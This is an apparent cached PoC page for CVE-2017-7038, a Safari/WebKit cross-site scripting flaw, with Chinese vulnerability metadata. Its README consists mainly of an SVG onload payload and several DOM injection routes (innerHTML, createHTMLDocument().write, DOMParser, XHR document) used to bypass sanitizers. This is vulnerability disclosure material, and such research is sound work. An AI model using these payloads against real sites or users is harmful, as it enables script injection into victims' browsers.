CVE-2017-7038 PoC — 多款Apple产品WebKit 跨站脚本漏洞

Source

https://github.com/ansjdnakjdnajkd/CVE-2017-7038

Associated Vulnerability

Title:多款Apple产品WebKit 跨站脚本漏洞 (CVE-2017-7038)
Description:Apple iOS、Safari和tvOS都是美国苹果（Apple）公司的产品。Apple iOS是为移动设备所开发的一套操作系统；Safari是一款Web浏览器，是Mac OS X和iOS操作系统附带的默认浏览器；tvOS是一套智能电视操作系统。WebKit是KDE社区开发的一套开源Web浏览器引擎，目前被Apple Safari及Google Chrome等浏览器使用。多款Apple产品中的WebKit组件存在跨站脚本漏洞。远程攻击者可利用该漏洞注入任意的Web脚本或HTML。以下产品和版本受到影响

Description

Safari XSS (CVE-2017-7038) https://support.apple.com/en-us/HT207923

Readme

# CVE-2017-7038
Safari XSS (CVE-2017-7038) https://support.apple.com/en-us/HT207923

**Document implementation XSS vulnerability**

```
var payload = '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>';

document.createElement('body').innerHTML = payload;

document.implementation.createHTMLDocument().write(payload);

new DOMParser().parseFromString(payload, 'text/html');

var xhr = new XMLHttpRequest;
xhr.responseType='document'
xhr.open('GET', 'data:text/html,', false);
xhr.send(null);
xhr.response.body.innerHTML=payload;
```

Authors: [@ansjdnakjdnajkd](https://twitter.com/ansjdnakjdnajkd) and [@ShikariSenpai](https://twitter.com/ShikariSenpai)

Thanks and fix also at https://github.com/cure53/DOMPurify/releases/tag/0.8.7

File Snapshot


 [4.0K]  /data/pocs/04ea52eaac3a4db294f23a216444c6cd4efacb54
└── [ 767]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!